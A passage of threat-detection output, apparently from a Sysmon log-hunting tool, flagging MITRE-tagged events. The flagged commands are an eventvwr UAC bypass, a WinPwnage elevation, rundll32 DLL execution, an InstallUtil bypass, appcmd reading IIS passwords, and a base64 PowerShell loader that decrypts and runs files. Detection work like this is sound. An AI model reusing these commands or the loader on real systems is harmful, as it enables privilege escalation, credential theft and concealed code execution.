IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.542 + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5976 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.994 + 365ABB72-3D6F-5CEB-0000-001032DBFF00 + 1900 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 01:59:28.903 + 365ABB72-8980-5CD3-0000-0010134D1F00 + 3840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-8980-5CD3-0000-00105F451F00 + 3884 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6171 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:43.969 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6171 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:43.969 + 365ABB72-FE6B-5CEB-0000-00102A090C00 + 1536 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16245 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:35.070 + 365ABB72-69A3-5CD7-0000-0010306F2200 + 3752 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /run /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16451 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:03.558 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-252D-5CD8-0000-001019E20300 + 2800 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2362770 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-11-26 17:38:11.175 + 00247C92-E803-5FBF-0000-0010F2BFB40C + 16980 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + C:\windows\system32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-3404-5FBE-0000-0020E0C90600 + 0x6c9e0 + 1 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-E803-5FBF-0000-0010CDB9B40C + 17336 + C:\Windows\System32\taskhostw.exe + taskhostw.exe $(Arg0) + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7681 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:22:05.660 + 365ABB72-9C9D-5D04-0000-001039CE1600 + 172 + C:\Windows\System32\wscript.exe + 5.8.7600.16385 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983 + 365ABB72-9C8E-5D04-0000-0010D0421600 + 540 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4900 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:13.169 + 747F3D96-6619-5D3F-0000-0010FDE78600 + 5116 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5973 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.924 + 365ABB72-3D6F-5CEB-0000-001072D7FF00 + 3640 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 13:50:28.662 + 747F3D96-9124-5D45-0000-00103B986101 + 6236 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-9124-5D45-0000-001022926101 + 3180 + C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe + "C:\Users\IEUser\AppData\Local\Temp\fubuki.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5407 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 11:23:17.636 + 